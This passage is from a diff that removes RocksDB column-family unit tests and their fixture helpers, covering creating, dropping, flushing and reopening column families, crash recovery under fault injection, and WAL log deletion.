-    Open({"default"});
-  }
-
-  DBImpl* dbfull() { return reinterpret_cast<DBImpl*>(db_); }
-
-  int GetProperty(int cf, std::string property) {
-    std::string value;
-    EXPECT_TRUE(dbfull()->GetProperty(handles_[cf], property, &value));
-#ifndef CYGWIN
-    return std::stoi(value);
-#else
-    return std::strtol(value.c_str(), 0 /* off */, 10 /* base */);
-#endif
-  }
-
-  bool IsDbWriteStopped() {
-#ifndef ROCKSDB_LITE
-    uint64_t v;
-    EXPECT_TRUE(dbfull()->GetIntProperty("rocksdb.is-write-stopped", &v));
-    return (v == 1);
-#else
-    return dbfull()->TEST_write_controler().IsStopped();
-#endif  // !ROCKSDB_LITE
-  }
-
-  uint64_t GetDbDelayedWriteRate() {
-#ifndef ROCKSDB_LITE
-    uint64_t v;
-    EXPECT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.actual-delayed-write-rate", &v));
-    return v;
-#else
-    if (!dbfull()->TEST_write_controler().NeedsDelay()) {
-      return 0;
-    }
-    return dbfull()->TEST_write_controler().delayed_write_rate();
-#endif  // !ROCKSDB_LITE
-  }
-
-  void Destroy() {
-    Close();
-    ASSERT_OK(DestroyDB(dbname_, Options(db_options_, column_family_options_)));
-  }
-
-  void CreateColumnFamilies(
-      const std::vector<std::string>& cfs,
-      const std::vector<ColumnFamilyOptions> options = {}) {
-    int cfi = static_cast<int>(handles_.size());
-    handles_.resize(cfi + cfs.size());
-    names_.resize(cfi + cfs.size());
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      const auto& current_cf_opt =
-          options.size() == 0 ? column_family_options_ : options[i];
-      ASSERT_OK(
-          db_->CreateColumnFamily(current_cf_opt, cfs[i], &handles_[cfi]));
-      names_[cfi] = cfs[i];
-
-#ifndef ROCKSDB_LITE  // RocksDBLite does not support GetDescriptor
-      // Verify the CF options of the returned CF handle.
-      ColumnFamilyDescriptor desc;
-      ASSERT_OK(handles_[cfi]->GetDescriptor(&desc));
-      RocksDBOptionsParser::VerifyCFOptions(desc.options, current_cf_opt);
-#endif  // !ROCKSDB_LITE
-      cfi++;
-    }
-  }
-
-  void Reopen(const std::vector<ColumnFamilyOptions> options = {}) {
-    std::vector<std::string> names;
-    for (auto name : names_) {
-      if (name != "") {
-        names.push_back(name);
-      }
-    }
-    Close();
-    assert(options.size() == 0 || names.size() == options.size());
-    Open(names, options);
-  }
-
-  void CreateColumnFamiliesAndReopen(const std::vector<std::string>& cfs) {
-    CreateColumnFamilies(cfs);
-    Reopen();
-  }
-
-  void DropColumnFamilies(const std::vector<int>& cfs) {
-    for (auto cf : cfs) {
-      ASSERT_OK(db_->DropColumnFamily(handles_[cf]));
-      db_->DestroyColumnFamilyHandle(handles_[cf]);
-      handles_[cf] = nullptr;
-      names_[cf] = "";
-    }
-  }
-
-  void PutRandomData(int cf, int num, int key_value_size, bool save = false) {
-    for (int i = 0; i < num; ++i) {
-      // 10 bytes for key, rest is value
-      if (!save) {
-        ASSERT_OK(Put(cf, test::RandomKey(&rnd_, 11),
-                      RandomString(&rnd_, key_value_size - 10)));
-      } else {
-        std::string key = test::RandomKey(&rnd_, 11);
-        keys_.insert(key);
-        ASSERT_OK(Put(cf, key, RandomString(&rnd_, key_value_size - 10)));
-      }
-    }
-    db_->FlushWAL(false);
-  }
-
-#ifndef ROCKSDB_LITE  // TEST functions in DB are not supported in lite
-  void WaitForFlush(int cf) {
-    ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable(handles_[cf]));
-  }
-
-  void WaitForCompaction() {
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-
-  uint64_t MaxTotalInMemoryState() {
-    return dbfull()->TEST_MaxTotalInMemoryState();
-  }
-
-  void AssertMaxTotalInMemoryState(uint64_t value) {
-    ASSERT_EQ(value, MaxTotalInMemoryState());
-  }
-#endif  // !ROCKSDB_LITE
-
-  Status Put(int cf, const std::string& key, const std::string& value) {
-    return db_->Put(WriteOptions(), handles_[cf], Slice(key), Slice(value));
-  }
-  Status Merge(int cf, const std::string& key, const std::string& value) {
-    return db_->Merge(WriteOptions(), handles_[cf], Slice(key), Slice(value));
-  }
-  Status Flush(int cf) {
-    return db_->Flush(FlushOptions(), handles_[cf]);
-  }
-
-  std::string Get(int cf, const std::string& key) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    std::string result;
-    Status s = db_->Get(options, handles_[cf], Slice(key), &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  void CompactAll(int cf) {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), handles_[cf], nullptr,
-                                nullptr));
-  }
-
-  void Compact(int cf, const Slice& start, const Slice& limit) {
-    ASSERT_OK(
-        db_->CompactRange(CompactRangeOptions(), handles_[cf], &start, &limit));
-  }
-
-  int NumTableFilesAtLevel(int level, int cf) {
-    return GetProperty(cf,
-                       "rocksdb.num-files-at-level" + ToString(level));
-  }
-
-#ifndef ROCKSDB_LITE
-  // Return spread of files per level
-  std::string FilesPerLevel(int cf) {
-    std::string result;
-    int last_non_zero_offset = 0;
-    for (int level = 0; level < dbfull()->NumberLevels(handles_[cf]); level++) {
-      int f = NumTableFilesAtLevel(level, cf);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = static_cast<int>(result.size());
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-#endif
-
-  void AssertFilesPerLevel(const std::string& value, int cf) {
-#ifndef ROCKSDB_LITE
-    ASSERT_EQ(value, FilesPerLevel(cf));
-#endif
-  }
-
-#ifndef ROCKSDB_LITE  // GetLiveFilesMetaData is not supported
-  int CountLiveFiles() {
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
-    return static_cast<int>(metadata.size());
-  }
-#endif  // !ROCKSDB_LITE
-
-  void AssertCountLiveFiles(int expected_value) {
-#ifndef ROCKSDB_LITE
-    ASSERT_EQ(expected_value, CountLiveFiles());
-#endif
-  }
-
-  // Do n memtable flushes, each of which produces an sstable
-  // covering the range [small,large].
-  void MakeTables(int cf, int n, const std::string& small,
-                  const std::string& large) {
-    for (int i = 0; i < n; i++) {
-      ASSERT_OK(Put(cf, small, "begin"));
-      ASSERT_OK(Put(cf, large, "end"));
-      ASSERT_OK(db_->Flush(FlushOptions(), handles_[cf]));
-    }
-  }
-
-#ifndef ROCKSDB_LITE  // GetSortedWalFiles is not supported
-  int CountLiveLogFiles() {
-    int micros_wait_for_log_deletion = 20000;
-    env_->SleepForMicroseconds(micros_wait_for_log_deletion);
-    int ret = 0;
-    VectorLogPtr wal_files;
-    Status s;
-    // GetSortedWalFiles is a flakey function -- it gets all the wal_dir
-    // children files and then later checks for their existence. if some of the
-    // log files doesn't exist anymore, it reports an error. it does all of this
-    // without DB mutex held, so if a background process deletes the log file
-    // while the function is being executed, it returns an error. We retry the
-    // function 10 times to avoid the error failing the test
-    for (int retries = 0; retries < 10; ++retries) {
-      wal_files.clear();
-      s = db_->GetSortedWalFiles(wal_files);
-      if (s.ok()) {
-        break;
-      }
-    }
-    EXPECT_OK(s);
-    for (const auto& wal : wal_files) {
-      if (wal->Type() == kAliveLogFile) {
-        ++ret;
-      }
-    }
-    return ret;
-    return 0;
-  }
-#endif  // !ROCKSDB_LITE
-
-  void AssertCountLiveLogFiles(int value) {
-#ifndef ROCKSDB_LITE  // GetSortedWalFiles is not supported
-    ASSERT_EQ(value, CountLiveLogFiles());
-#endif  // !ROCKSDB_LITE
-  }
-
-  void AssertNumberOfImmutableMemtables(std::vector<int> num_per_cf) {
-    assert(num_per_cf.size() == handles_.size());
-
-#ifndef ROCKSDB_LITE  // GetProperty is not supported in lite
-    for (size_t i = 0; i < num_per_cf.size(); ++i) {
-      ASSERT_EQ(num_per_cf[i], GetProperty(static_cast<int>(i),
-                                           "rocksdb.num-immutable-mem-table"));
-    }
-#endif  // !ROCKSDB_LITE
-  }
-
-  void CopyFile(const std::string& source, const std::string& destination,
-                uint64_t size = 0) {
-    const EnvOptions soptions;
-    unique_ptr<SequentialFile> srcfile;
-    ASSERT_OK(env_->NewSequentialFile(source, &srcfile, soptions));
-    unique_ptr<WritableFile> destfile;
-    ASSERT_OK(env_->NewWritableFile(destination, &destfile, soptions));
-
-    if (size == 0) {
-      // default argument means copy everything
-      ASSERT_OK(env_->GetFileSize(source, &size));
-    }
-
-    char buffer[4096];
-    Slice slice;
-    while (size > 0) {
-      uint64_t one = std::min(uint64_t(sizeof(buffer)), size);
-      ASSERT_OK(srcfile->Read(one, &slice, buffer));
-      ASSERT_OK(destfile->Append(slice));
-      size -= slice.size();
-    }
-    ASSERT_OK(destfile->Close());
-  }
-
-  std::vector<ColumnFamilyHandle*> handles_;
-  std::vector<std::string> names_;
-  std::set<std::string> keys_;
-  ColumnFamilyOptions column_family_options_;
-  DBOptions db_options_;
-  std::string dbname_;
-  DB* db_ = nullptr;
-  EnvCounter* env_;
-  Random rnd_;
-};
-
-TEST_F(ColumnFamilyTest, DontReuseColumnFamilyID) {
-  for (int iter = 0; iter < 3; ++iter) {
-    Open();
-    CreateColumnFamilies({"one", "two", "three"});
-    for (size_t i = 0; i < handles_.size(); ++i) {
-      auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(handles_[i]);
-      ASSERT_EQ(i, cfh->GetID());
-    }
-    if (iter == 1) {
-      Reopen();
-    }
-    DropColumnFamilies({3});
-    Reopen();
-    if (iter == 2) {
-      // this tests if max_column_family is correctly persisted with
-      // WriteSnapshot()
-      Reopen();
-    }
-    CreateColumnFamilies({"three2"});
-    // ID 3 that was used for dropped column family "three" should not be reused
-    auto cfh3 = reinterpret_cast<ColumnFamilyHandleImpl*>(handles_[3]);
-    ASSERT_EQ(4U, cfh3->GetID());
-    Close();
-    Destroy();
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(ColumnFamilyTest, CreateCFRaceWithGetAggProperty) {
-  Open();
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::WriteOptionsFile:1",
-        "ColumnFamilyTest.CreateCFRaceWithGetAggProperty:1"},
-       {"ColumnFamilyTest.CreateCFRaceWithGetAggProperty:2",
-        "DBImpl::WriteOptionsFile:2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&] { CreateColumnFamilies({"one"}); });
-
-  TEST_SYNC_POINT("ColumnFamilyTest.CreateCFRaceWithGetAggProperty:1");
-  uint64_t pv;
-  db_->GetAggregatedIntProperty(DB::Properties::kEstimateTableReadersMem, &pv);
-  TEST_SYNC_POINT("ColumnFamilyTest.CreateCFRaceWithGetAggProperty:2");
-
-  thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-#endif  // !ROCKSDB_LITE
-
-class FlushEmptyCFTestWithParam : public ColumnFamilyTest,
-                                  public testing::WithParamInterface<bool> {
- public:
-  FlushEmptyCFTestWithParam() { allow_2pc_ = GetParam(); }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  bool allow_2pc_;
-};
-
-TEST_P(FlushEmptyCFTestWithParam, FlushEmptyCFTest) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  db_options_.env = fault_env.get();
-  db_options_.allow_2pc = allow_2pc_;
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  // Generate log file A.
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 1
-
-  Reopen();
-  // Log file A is not dropped after reopening because default column family's
-  // min log number is 0.
-  // It flushes to SST file X
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 2
-  ASSERT_OK(Put(1, "bar", "v2"));  // seqID 3
-  // Current log file is file B now. While flushing, a new log file C is created
-  // and is set to current. Boths' min log number is set to file C in memory, so
-  // after flushing file B is deleted. At the same time, the min log number of
-  // default CF is not written to manifest. Log file A still remains.
-  // Flushed to SST file Y.
-  Flush(1);
-  Flush(0);
-  ASSERT_OK(Put(1, "bar", "v3"));  // seqID 4
-  ASSERT_OK(Put(1, "foo", "v4"));  // seqID 5
-  db_->FlushWAL(false);
-
-  // Preserve file system state up to here to simulate a crash condition.
-  fault_env->SetFilesystemActive(false);
-  std::vector<std::string> names;
-  for (auto name : names_) {
-    if (name != "") {
-      names.push_back(name);
-    }
-  }
-
-  Close();
-  fault_env->ResetState();
-
-  // Before opening, there are four files:
-  //   Log file A contains seqID 1
-  //   Log file C contains seqID 4, 5
-  //   SST file X contains seqID 1
-  //   SST file Y contains seqID 2, 3
-  // Min log number:
-  //   default CF: 0
-  //   CF one, two: C
-  // When opening the DB, all the seqID should be preserved.
-  Open(names, {});
-  ASSERT_EQ("v4", Get(1, "foo"));
-  ASSERT_EQ("v3", Get(1, "bar"));
-  Close();
-
-  db_options_.env = env_;
-}
-
-TEST_P(FlushEmptyCFTestWithParam, FlushEmptyCFTest2) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  db_options_.env = fault_env.get();
-  db_options_.allow_2pc = allow_2pc_;
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  // Generate log file A.
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 1
-
-  Reopen();
-  // Log file A is not dropped after reopening because default column family's
-  // min log number is 0.
-  // It flushes to SST file X
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 2
-  ASSERT_OK(Put(1, "bar", "v2"));  // seqID 3
-  // Current log file is file B now. While flushing, a new log file C is created
-  // and is set to current. Both CFs' min log number is set to file C so after
-  // flushing file B is deleted. Log file A still remains.
-  // Flushed to SST file Y.
-  Flush(1);
-  ASSERT_OK(Put(0, "bar", "v2"));  // seqID 4
-  ASSERT_OK(Put(2, "bar", "v2"));  // seqID 5
-  ASSERT_OK(Put(1, "bar", "v3"));  // seqID 6
-  // Flushing all column families. This forces all CFs' min log to current. This
-  // is written to the manifest file. Log file C is cleared.
-  Flush(0);
-  Flush(1);
-  Flush(2);
-  // Write to log file D
-  ASSERT_OK(Put(1, "bar", "v4"));  // seqID 7
-  ASSERT_OK(Put(1, "bar", "v5"));  // seqID 8
-  db_->FlushWAL(false);
-  // Preserve file system state up to here to simulate a crash condition.
-  fault_env->SetFilesystemActive(false);
-  std::vector<std::string> names;
-  for (auto name : names_) {
-    if (name != "") {
-      names.push_back(name);
-    }
-  }
-
-  Close();
-  fault_env->ResetState();
-  // Before opening, there are two logfiles:
-  //   Log file A contains seqID 1
-  //   Log file D contains seqID 7, 8
-  // Min log number:
-  //   default CF: D
-  //   CF one, two: D
-  // When opening the DB, log file D should be replayed using the seqID
-  // specified in the file.
-  Open(names, {});
-  ASSERT_EQ("v1", Get(1, "foo"));
-  ASSERT_EQ("v5", Get(1, "bar"));
-  Close();
-
-  db_options_.env = env_;
-}
-
-INSTANTIATE_TEST_CASE_P(FlushEmptyCFTestWithParam, FlushEmptyCFTestWithParam,
-                        ::testing::Bool());
-
-TEST_F(ColumnFamilyTest, AddDrop) {
-  Open();
-  CreateColumnFamilies({"one", "two", "three"});
-  ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-  ASSERT_EQ("NOT_FOUND", Get(2, "fodor"));
-  DropColumnFamilies({2});
-  ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-  CreateColumnFamilies({"four"});
-  ASSERT_EQ("NOT_FOUND", Get(3, "fodor"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  ASSERT_EQ("NOT_FOUND", Get(3, "fodor"));
-  Close();
-  ASSERT_TRUE(TryOpen({"default"}).IsInvalidArgument());
-  Open({"default", "one", "three", "four"});
-  DropColumnFamilies({1});
-  Reopen();
-  Close();
-
-  std::vector<std::string> families;
-  ASSERT_OK(DB::ListColumnFamilies(db_options_, dbname_, &families));
-  std::sort(families.begin(), families.end());
-  ASSERT_TRUE(families ==
-              std::vector<std::string>({"default", "four", "three"}));
-}
-
-TEST_F(ColumnFamilyTest, BulkAddDrop) {
-  constexpr int kNumCF = 1000;
-  ColumnFamilyOptions cf_options;
-  WriteOptions write_options;
-  Open();
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyHandle*> cf_handles;
-  for (int i = 1; i <= kNumCF; i++) {
-    cf_names.push_back("cf1-" + ToString(i));
-  }
-  ASSERT_OK(db_->CreateColumnFamilies(cf_options, cf_names, &cf_handles));
-  for (int i = 1; i <= kNumCF; i++) {
-    ASSERT_OK(db_->Put(write_options, cf_handles[i - 1], "foo", "bar"));
-  }
-  ASSERT_OK(db_->DropColumnFamilies(cf_handles));
-  std::vector<ColumnFamilyDescriptor> cf_descriptors;
-  for (auto* handle : cf_handles) {
-    delete handle;
-  }
-  cf_handles.clear();
-  for (int i = 1; i <= kNumCF; i++) {
-    cf_descriptors.emplace_back("cf2-" + ToString(i), ColumnFamilyOptions());
-  }
-  ASSERT_OK(db_->CreateColumnFamilies(cf_descriptors, &cf_handles));
-  for (int i = 1; i <= kNumCF; i++) {
-    ASSERT_OK(db_->Put(write_options, cf_handles[i - 1], "foo", "bar"));
-  }
-  ASSERT_OK(db_->DropColumnFamilies(cf_handles));
-  for (auto* handle : cf_handles) {
-    delete handle;
-  }
-  Close();
-  std::vector<std::string> families;
-  ASSERT_OK(DB::ListColumnFamilies(db_options_, dbname_, &families));
-  std::sort(families.begin(), families.end());
-  ASSERT_TRUE(families == std::vector<std::string>({"default"}));
-}
-
-TEST_F(ColumnFamilyTest, DropTest) {
-  // first iteration - dont reopen DB before dropping
-  // second iteration - reopen DB before dropping
-  for (int iter = 0; iter < 2; ++iter) {
-    Open({"default"});
-    CreateColumnFamiliesAndReopen({"pikachu"});
-    for (int i = 0; i < 100; ++i) {
-      ASSERT_OK(Put(1, ToString(i), "bar" + ToString(i)));
-    }
-    ASSERT_OK(Flush(1));
-
-    if (iter == 1) {
-      Reopen();
-    }
-    ASSERT_EQ("bar1", Get(1, "1"));
-
-    AssertCountLiveFiles(1);
-    DropColumnFamilies({1});
-    // make sure that all files are deleted when we drop the column family
-    AssertCountLiveFiles(0);
-    Destroy();
-  }
-}
-
-TEST_F(ColumnFamilyTest, WriteBatchFailure) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-  WriteBatch batch;
-  batch.Put(handles_[0], Slice("existing"), Slice("column-family"));
-  batch.Put(handles_[1], Slice("non-existing"), Slice("column-family"));
-  ASSERT_OK(db_->Write(WriteOptions(), &batch));
-  DropColumnFamilies({1});
-  WriteOptions woptions_ignore_missing_cf;
-  woptions_ignore_missing_cf.ignore_missing_column_families = true;
-  batch.Put(handles_[0], Slice("still here"), Slice("column-family"));
-  ASSERT_OK(db_->Write(woptions_ignore_missing_cf, &batch));
-  ASSERT_EQ("column-family", Get(0, "still here"));
-  Status s = db_->Write(WriteOptions(), &batch);
-  ASSERT_TRUE(s.IsInvalidArgument());
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, ReadWrite) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-  ASSERT_OK(Put(0, "foo", "v1"));
-  ASSERT_OK(Put(0, "bar", "v2"));
-  ASSERT_OK(Put(1, "mirko", "v3"));
-  ASSERT_OK(Put(0, "foo", "v2"));
-  ASSERT_OK(Put(2, "fodor", "v5"));
-
-  for (int iter = 0; iter <= 3; ++iter) {
-    ASSERT_EQ("v2", Get(0, "foo"));
-    ASSERT_EQ("v2", Get(0, "bar"));
-    ASSERT_EQ("v3", Get(1, "mirko"));
-    ASSERT_EQ("v5", Get(2, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(2, "foo"));
-    if (iter <= 1) {
-      Reopen();
-    }
-  }
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, IgnoreRecoveredLog) {
-  std::string backup_logs = dbname_ + "/backup_logs";
-
-  // delete old files in backup_logs directory
-  ASSERT_OK(env_->CreateDirIfMissing(dbname_));
-  ASSERT_OK(env_->CreateDirIfMissing(backup_logs));
-  std::vector<std::string> old_files;
-  env_->GetChildren(backup_logs, &old_files);
-  for (auto& file : old_files) {
-    if (file != "." && file != "..") {
-      env_->DeleteFile(backup_logs + "/" + file);
-    }
-  }
-
-  column_family_options_.merge_operator =
-      MergeOperators::CreateUInt64AddOperator();
-  db_options_.wal_dir = dbname_ + "/logs";
-  Destroy();
-  Open();
-  CreateColumnFamilies({"cf1", "cf2"});
-
-  // fill up the DB
-  std::string one, two, three;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
-  PutFixed64(&three, 3);
-  ASSERT_OK(Merge(0, "foo", one));
-  ASSERT_OK(Merge(1, "mirko", one));
-  ASSERT_OK(Merge(0, "foo", one));
-  ASSERT_OK(Merge(2, "bla", one));
-  ASSERT_OK(Merge(2, "fodor", one));
-  ASSERT_OK(Merge(0, "bar", one));
-  ASSERT_OK(Merge(2, "bla", one));
-  ASSERT_OK(Merge(1, "mirko", two));
-  ASSERT_OK(Merge(1, "franjo", one));
-
-  // copy the logs to backup
-  std::vector<std::string> logs;
-  env_->GetChildren(db_options_.wal_dir, &logs);
-  for (auto& log : logs) {
-    if (log != ".." && log != ".") {
-      CopyFile(db_options_.wal_dir + "/" + log, backup_logs + "/" + log);
-    }
-  }
-
-  // recover the DB
-  Close();
-
-  // 1. check consistency
-  // 2. copy the logs from backup back to WAL dir. if the recovery happens
-  // again on the same log files, this should lead to incorrect results
-  // due to applying merge operator twice
-  // 3. check consistency
-  for (int iter = 0; iter < 2; ++iter) {
-    // assert consistency
-    Open({"default", "cf1", "cf2"});
-    ASSERT_EQ(two, Get(0, "foo"));
-    ASSERT_EQ(one, Get(0, "bar"));
-    ASSERT_EQ(three, Get(1, "mirko"));
-    ASSERT_EQ(one, Get(1, "franjo"));
-    ASSERT_EQ(one, Get(2, "fodor"));
-    ASSERT_EQ(two, Get(2, "bla"));
-    Close();
-
-    if (iter == 0) {
-      // copy the logs from backup back to wal dir
-      for (auto& log : logs) {
-        if (log != ".." && log != ".") {
-          CopyFile(backup_logs + "/" + log, db_options_.wal_dir + "/" + log);
-        }
-      }
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE  // TEST functions used are not supported
-TEST_F(ColumnFamilyTest, FlushTest) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-  ASSERT_OK(Put(0, "foo", "v1"));
-  ASSERT_OK(Put(0, "bar", "v2"));
-  ASSERT_OK(Put(1, "mirko", "v3"));
-  ASSERT_OK(Put(0, "foo", "v2"));
-  ASSERT_OK(Put(2, "fodor", "v5"));
-
-  for (int j = 0; j < 2; j++) {
-    ReadOptions ro;
-    std::vector<Iterator*> iterators;
-    // Hold super version.
-    if (j == 0) {
-      ASSERT_OK(db_->NewIterators(ro, handles_, &iterators));
-    }
-
-    for (int i = 0; i < 3; ++i) {
-      uint64_t max_total_in_memory_state =
-          MaxTotalInMemoryState();
-      Flush(i);
-      AssertMaxTotalInMemoryState(max_total_in_memory_state);
-    }
-    ASSERT_OK(Put(1, "foofoo", "bar"));
-    ASSERT_OK(Put(0, "foofoo", "bar"));
-
-    for (auto* it : iterators) {
-      delete it;
-    }
-  }
-  Reopen();
-
-  for (int iter = 0; iter <= 2; ++iter) {
-    ASSERT_EQ("v2", Get(0, "foo"));
-    ASSERT_EQ("v2", Get(0, "bar"));
-    ASSERT_EQ("v3", Get(1, "mirko"));
-    ASSERT_EQ("v5", Get(2, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(2, "foo"));
-    if (iter <= 1) {
-      Reopen();
-    }
-  }
-  Close();
-}
-
-// Makes sure that obsolete log files get deleted
-TEST_F(ColumnFamilyTest, LogDeletionTest) {
-  db_options_.max_total_wal_size = std::numeric_limits<uint64_t>::max();
-  column_family_options_.arena_block_size = 4 * 1024;
-  column_family_options_.write_buffer_size = 100000;  // 100KB
-  Open();
-  CreateColumnFamilies({"one", "two", "three", "four"});
-  // Each bracket is one log file. if number is in (), it means
-  // we don't need it anymore (it's been flushed)
-  // []
-  AssertCountLiveLogFiles(0);
-  PutRandomData(0, 1, 100);
-  // [0]
-  PutRandomData(1, 1, 100);
-  // [0, 1]
-  PutRandomData(1, 1000, 100);
-  WaitForFlush(1);
-  // [0, (1)] [1]
-  AssertCountLiveLogFiles(2);
-  PutRandomData(0, 1, 100);
-  // [0, (1)] [0, 1]
-  AssertCountLiveLogFiles(2);
-  PutRandomData(2, 1, 100);
-  // [0, (1)] [0, 1, 2]
-  PutRandomData(2, 1000, 100);
-  WaitForFlush(2);
-  // [0, (1)] [0, 1, (2)] [2]
-  AssertCountLiveLogFiles(3);
-  PutRandomData(2, 1000, 100);
-  WaitForFlush(2);
-  // [0, (1)] [0, 1, (2)] [(2)] [2]
-  AssertCountLiveLogFiles(4);
-  PutRandomData(3, 1, 100);
-  // [0, (1)] [0, 1, (2)] [(2)] [2, 3]
-  PutRandomData(1, 1, 100);
-  // [0, (1)] [0, 1, (2)] [(2)] [1, 2, 3]
-  AssertCountLiveLogFiles(4);
-  PutRandomData(1, 1000, 100);
-  WaitForFlush(1);
-  // [0, (1)] [0, (1), (2)] [(2)] [(1), 2, 3] [1]
-  AssertCountLiveLogFiles(5);
-  PutRandomData(0, 1000, 100);
-  WaitForFlush(0);
-  // [(0), (1)] [(0), (1), (2)] [(2)] [(1), 2, 3] [1, (0)] [0]
-  // delete obsolete logs -->
-  // [(1), 2, 3] [1, (0)] [0]
-  AssertCountLiveLogFiles(3);
-  PutRandomData(0, 1000, 100);
-  WaitForFlush(0);
-  // [(1), 2, 3] [1, (0)], [(0)] [0]
-  AssertCountLiveLogFiles(4);
-  PutRandomData(1, 1000, 100);
-  WaitForFlush(1);
-  // [(1), 2, 3] [(1), (0)] [(0)] [0, (1)] [1]
-  AssertCountLiveLogFiles(5);
-  PutRandomData(2, 1000, 100);
-  WaitForFlush(2);
-  // [(1), (2), 3] [(1), (0)] [(0)] [0, (1)] [1, (2)], [2]
-  AssertCountLiveLogFiles(6);
-  PutRandomData(3, 1000, 100);
-  WaitForFlush(3);
-  // [(1), (2), (3)] [(1), (0)] [(0)] [0, (1)] [1, (2)], [2, (3)] [3]
-  // delete obsolete logs -->
-  // [0, (1)] [1, (2)], [2, (3)] [3]
-  AssertCountLiveLogFiles(4);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(ColumnFamilyTest, CrashAfterFlush) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  db_options_.env = fault_env.get();
-  Open();
-  CreateColumnFamilies({"one"});
-
-  WriteBatch batch;
-  batch.Put(handles_[0], Slice("foo"), Slice("bar"));
-  batch.Put(handles_[1], Slice("foo"), Slice("bar"));
-  ASSERT_OK(db_->Write(WriteOptions(), &batch));
-  Flush(0);
-  fault_env->SetFilesystemActive(false);
-
-  std::vector<std::string> names;
-  for (auto name : names_) {
-    if (name != "") {
-      names.push_back(name);
-    }
-  }
-  Close();
-  fault_env->DropUnsyncedFileData();
-  fault_env->ResetState();
-  Open(names, {});
-
-  // Write batch should be atomic.
-  ASSERT_EQ(Get(0, "foo"), Get(1, "foo"));
-
-  Close();
-  db_options_.env = env_;
-}
-
-TEST_F(ColumnFamilyTest, OpenNonexistentColumnFamily) {
-  ASSERT_OK(TryOpen({"default"}));
-  Close();
-  ASSERT_TRUE(TryOpen({"default", "dne"}).IsInvalidArgument());
-}
-
-#ifndef ROCKSDB_LITE  // WaitForFlush() is not supported
-// Makes sure that obsolete log files get deleted
-TEST_F(ColumnFamilyTest, DifferentWriteBufferSizes) {
-  // disable flushing stale column families
-  db_options_.max_total_wal_size = std::numeric_limits<uint64_t>::max();
-  Open();
-  CreateColumnFamilies({"one", "two", "three"});
-  ColumnFamilyOptions default_cf, one, two, three;
-  // setup options. all column families have max_write_buffer_number setup to 10
-  // "default" -> 100KB memtable, start flushing immediatelly
-  // "one" -> 200KB memtable, start flushing with two immutable memtables
-  // "two" -> 1MB memtable, start flushing with three immutable memtables
-  // "three" -> 90KB memtable, start flushing with four immutable memtables
-  default_cf.write_buffer_size = 100000;
-  default_cf.arena_block_size = 4 * 4096;
-  default_cf.max_write_buffer_number = 10;
-  default_cf.min_write_buffer_number_to_merge = 1;
-  default_cf.max_write_buffer_number_to_maintain = 0;
-  one.write_buffer_size = 200000;
-  one.arena_block_size = 4 * 4096;
-  one.max_write_buffer_number = 10;
-  one.min_write_buffer_number_to_merge = 2;
-  one.max_write_buffer_number_to_maintain = 1;
-  two.write_buffer_size = 1000000;
-  two.arena_block_size = 4 * 4096;
-  two.max_write_buffer_number = 10;
-  two.min_write_buffer_number_to_merge = 3;
-  two.max_write_buffer_number_to_maintain = 2;
-  three.write_buffer_size = 4096 * 22;
-  three.arena_block_size = 4096;
-  three.max_write_buffer_number = 10;
-  three.min_write_buffer_number_to_merge = 4;
-  three.max_write_buffer_number_to_maintain = -1;
-
-  Reopen({default_cf, one, two, three});
-
-  int micros_wait_for_flush = 10000;
-  PutRandomData(0, 100, 1000);
-  WaitForFlush(0);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(1);
-  PutRandomData(1, 200, 1000);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
